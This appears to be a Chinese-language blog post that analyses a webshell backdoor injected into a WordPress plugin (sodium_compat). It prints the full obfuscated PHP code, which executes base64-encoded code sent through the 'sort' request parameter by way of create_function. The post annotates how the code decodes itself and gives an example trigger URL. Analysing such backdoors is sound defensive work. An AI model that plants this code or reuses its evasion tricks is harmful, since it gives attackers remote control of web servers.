簡介
webshell就是以asp、php、jsp或者cgi等網頁檔案形式存在的一種命令執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了一個網站後,通常會將asp或php後門檔案與網站伺服器WEB目錄下正常的網頁檔案混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到一個命令執行環境,以達到控制網站伺服器的目的。1
分析
2019年11月27日,WordPress 站點不能訪問,分析之後發現 WordPress 外掛 sodium_compat 被人加料,程式碼如下。暫時不清楚黑客是如何注入,被加料內容是一個典型的 webshell 網站後門,利用 php 的 create_function 和 base64_decode 函式,且使用了大量的字串處理來逃避 webshell 檢測。
原始碼
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
$E();
exit();
}
解析
$ALpmKtOl8475 = "/jqsbr9ia654yug0ew1)*7dtp;m8lx_2fnvh3zo.ck(";
$kHTiDsnt7866 = "";
foreach([3,38,5,23] as $E){
$kHTiDsnt7866 .= $ALpmKtOl8475[$E];
}
## $kHTiDsnt7866 => 字串 sort 接收注入程式碼用
## 過濾請求
if(isset($_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"])){
$DDebczKe7430 = $_REQUEST /*IlrKKxaEyQYkVUUVAQbCmgexCXoxvTrWqZxLlUthFJqduXYQfOEmKNTKGadaSfRBShxfGLFeFWBpNsWfEfbqbOCqDwLWiKmAoIrTUVLuzCGVahNNWQrOmifqtmmmrJzS*/["$kHTiDsnt7866"];
$EqHZGFsG5581 = "";
$DmPqoAru8529 = "";
/*BFqVBKdwHVucHDLSKCdwDiTVwngSbkntEQocQxHZWXqOHINzkwYNpFtIhaZOzZmlBugDZEeVeugTChJBDKMyUvNOMfLdQhewrsRxbevlgjPspZyWQsuBuFbokFrMaJQa*/
foreach([4,8,3,16,9,11,30,22,16,40,38,22,16] as $E){
$EqHZGFsG5581 .= $ALpmKtOl8475[$E];
}
## $EqHZGFsG5581 => 函式 base64_decode
/*bJvLXYFVbsskXlgKXtVZMihhCyROeEvZEuTsNlIYPVOwxQISXNpPYfiuOKkkcTUqbyksvSGuxRecSOetQBEaewcaSqwZTBmbrWvMYSwkZgnbggtoDJLEdgPaRpCiDDyg*/
foreach([3,23,5,5,16,34] as $E){
$DmPqoAru8529 .= $ALpmKtOl8475[$E];
}
## $DmPqoAru8529 => 函式 strrev
/*BNAAulguuQqtnSBDkkMBWjwtJICKhYDEEYyHJYKXJSmfoXDkKeHSIGWguuvFFNCwBCphSfhTRoclivzmdsvCnwqmZAiVWVuHrAabUFyjSeLKWnoHqZdGNGDMxZODhxgl*/
$E = $DmPqoAru8529('n'.'o'.'i'.'t'.''.''.''.''.'c'.'n'.'u'.''.''.'f'.''.''.'_'.''.''.''.'e'.'t'.'a'.'e'.''.''.''.''.'r'.'c');
## $E => create_function
$E = $E("", $EqHZGFsG5581($DDebczKe7430));
## $DDebczKe7430 => 注入程式碼 base64_encode 值
## 示例 echo phpinfo(); base64 加密後得到 ZWNobyBwaHBpbmZvKCk7
## 請求 http://${wordpress.site}/wp-admin/wp-includes/sodium_compat/lib/constants.php?sort=ZWNobyBwaHBpbmZvKCk7 時會輸出 phpinfo 資訊,如果伺服器生產環境沒有關閉 exec,system 等函式,那麼後果不堪設想。
$E();
exit();
}
文獻引用
本作品採用《CC 協議》,轉載必須註明作者和本文連結